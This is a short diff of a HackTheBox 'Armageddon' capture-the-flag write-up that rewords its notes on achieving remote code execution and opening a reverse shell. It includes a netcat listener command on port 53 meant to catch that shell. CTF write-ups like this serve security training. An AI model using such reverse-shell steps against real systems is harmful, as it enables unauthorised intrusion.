evyatar9/Writeups/HackTheBox/Armageddon/README.md

 ```

-We have RCE.
+We have achieved Remote Code Execution (RCE).

-Let's get reverse shell, First, Listen on port 53
+To obtain a reverse shell, we can first listen on port `53` and then execute the necessary command to establish the connection:
 ```console
 ┌─[evyatar@parrot]─[/hackthebox/Armageddon]
 └──╼ $nc -lvp 53